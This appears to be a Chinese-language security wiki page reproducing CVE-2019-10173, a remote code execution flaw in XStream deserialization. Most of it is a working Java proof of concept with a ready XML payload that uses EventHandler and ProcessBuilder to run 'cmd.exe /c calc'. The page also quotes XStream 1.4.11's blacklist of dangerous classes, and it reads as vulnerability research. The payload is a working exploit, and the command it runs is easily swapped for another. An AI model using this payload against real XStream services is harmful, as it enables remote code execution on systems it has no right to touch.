menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 143-Xstream chevron_right 001-CVE-2019-10173 Xstream 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-CVE-2019-10173 Xstream 远程代码执行漏洞.md
    2.92 KB / 2021-07-17 00:01:30
        # CVE-2019-10173 Xstream 远程代码执行漏洞

### 一、漏洞简介

Xstream 1.4.10版本存在反序列化漏洞CVE-2013-7285补丁绕过。

### 二、漏洞影响

XStream <= 1.4.6

XStream = 1.4.10

### 三、复现过程

**poc**


```bash
package com.bigo;

import com.thoughtworks.xstream.XStream;

import java.beans.EventHandler;
import java.io.IOException;
import java.util.Set;
import java.util.TreeSet;

/**
 * Created by cfchi on 2019/7/26.
 */
public class Main {
    public static String expGen(){
        XStream xstream = new XStream();
        Set<Comparable> set = new TreeSet<Comparable>();
        set.add("foo");
        set.add(EventHandler.create(Comparable.class, new ProcessBuilder("calc"), "start"));
        String payload = xstream.toXML(set);
        System.out.println(payload);
        return payload;
    }
    public static void main(String[] args) throws IOException {
        expGen();
        XStream xStream = new XStream();
        String payload = "<sorted-set>\n" +
                "    <string>foo</string>\n" +
                "    <dynamic-proxy>\n" +
                "    <interface>java.lang.Comparable</interface>\n" +
                "        <handler class=\"java.beans.EventHandler\">\n" +
                "            <target class=\"java.lang.ProcessBuilder\">\n" +
                "                <command>\n" +
                "                    <string>cmd.exe</string>\n" +
                "                    <string>/c</string>\n" +
                "                    <string>calc</string>\n" +
                "                </command>\n" +
                "            </target>\n" +
                "     <action>start</action>"+
                "        </handler>\n" +
                "    </dynamic-proxy>\n" +
                "</sorted-set>\n";
       xStream.fromXML(payload);
    }
}

```

1.4.7版本白名单

![](images/15896427860075.png)


1.4.10版本,黑名单未开启

![](images/15896427938397.png)

1.4.10版本,黑名单未开启

![](images/15896428355583.png)


1.4.11版本,黑名单开启

黑名单


```java
private class InternalBlackList implements Converter {
    private InternalBlackList() {
    }

    public boolean canConvert(Class type) {
        return type == Void.TYPE || type == Void.class || !XStream.this.securityInitialized && type != null && (type.getName().equals("java.beans.EventHandler") || type.getName().endsWith("$LazyIterator") || type.getName().startsWith("javax.crypto."));
    }

    public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
        throw new ConversionException("Security alert. Marshalling rejected.");
    }

    public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
        throw new ConversionException("Security alert. Unmarshalling rejected.");
    }
}
```

![](images/15896428607039.png)


参考链接

http://www.polaris-lab.com/index.php/archives/658/
    links
    file_download